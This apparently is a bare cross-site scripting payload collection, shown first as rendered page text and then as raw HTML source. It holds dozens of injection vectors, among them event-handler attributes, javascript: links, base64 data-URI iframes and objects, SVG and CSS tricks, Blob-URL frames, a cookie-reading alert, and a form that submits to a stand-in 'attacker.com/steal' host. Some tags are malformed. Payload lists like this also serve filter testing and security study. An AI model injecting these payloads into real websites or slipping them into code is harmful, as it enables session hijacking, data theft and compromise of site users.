Drag me
window.onstorage = function(e) { alert('XSS from storage event') };
localStorage.setItem('test', 'XSS');
XSS
Click me
var win = window.open('about:blank', '_self');
win.document.write('alert("XSS")');
win.document.close();
var observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
alert('XSS via MutationObserver');
});
});
observer.observe(document.getElementById('xss'), { attributes: true });
document.getElementById('xss').setAttribute('data-xss', 'trigger');
Click me
Cut this text
(Unsupported data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=)
var img = document.createElement('img');
img.setAttribute('onerror', 'alert("XSS")');
img.src = 'invalid';
document.body.appendChild(img);
''-alert('XSS')//
document.cookie="username=alert('XSS')";
Click me
(Unsupported data:text/html,<script>alert('XSS'))
asd
var blob = new Blob(["alert('XSS')"], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var iframe = document.createElement('iframe');
iframe.src = url;
document.body.appendChild(iframe);
<div draggable="true" ondragstart="alert('XSS')">Drag me</div>
<script>
window.onstorage = function(e) { alert('XSS from storage event') };
localStorage.setItem('test', 'XSS');
</script>
<div itemscope itemtype="http://schema.org/Person">
<span itemprop="name" contenteditable onblur="alert('XSS')">XSS</span>
</div>
<a href="javascript:alert`XSS`">Click me</a>
<svg>
<use xlink:href="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ1hTUycpPjwvc3ZnPg=="></use>
</svg>
<script>
var win = window.open('about:blank', '_self');
win.document.write('alert("XSS")');
win.document.close();
</script>
<link rel="import" href="data:text/html,alert('XSS')">
<meta http-equiv="Content-Security-Policy" content="report-uri javascript:alert('XSS')">
<div id="xss"></div>
<script>
var observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
alert('XSS via MutationObserver');
});
});
observer.observe(document.getElementById('xss'), { attributes: true });
document.getElementById('xss').setAttribute('data-xss', 'trigger');
</script>
<style>@import 'javascript:alert("XSS")';</style>
<button onclick="`${alert('XSS')}`">Click me</button>
<textarea oncut="alert('XSS')">Cut this text</textarea>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></iframe>
<form action="https://attacker.com/steal?data=alert('XSS')">
<input type="submit" value="Submit">
</form>
<script>
var img = document.createElement('img');
img.setAttribute('onerror', 'alert("XSS")');
img.src = 'invalid';
document.body.appendChild(img);
</script>
<svg width="100" height="100">
<animate attributeName="xlink:href" from="javascript:alert('XSS')" to=" " />
</svg>
<script>''-alert('XSS')//
<script>document.cookie="username=alert('XSS')";</script>
<a href="#' onclick='alert(document.cookie)'">Click me</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ+" type="text/html"></object>
<iframe src="data:text/html,alert('XSS')"></script>">iframe>
asd
<audio src="x" onerror="alert('XSS')"></audio>
<script>
var blob = new Blob(["alert('XSS')<\/script>"], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var iframe = document.createElement('iframe');
iframe.src = url;
document.body.appendChild(iframe);
</script>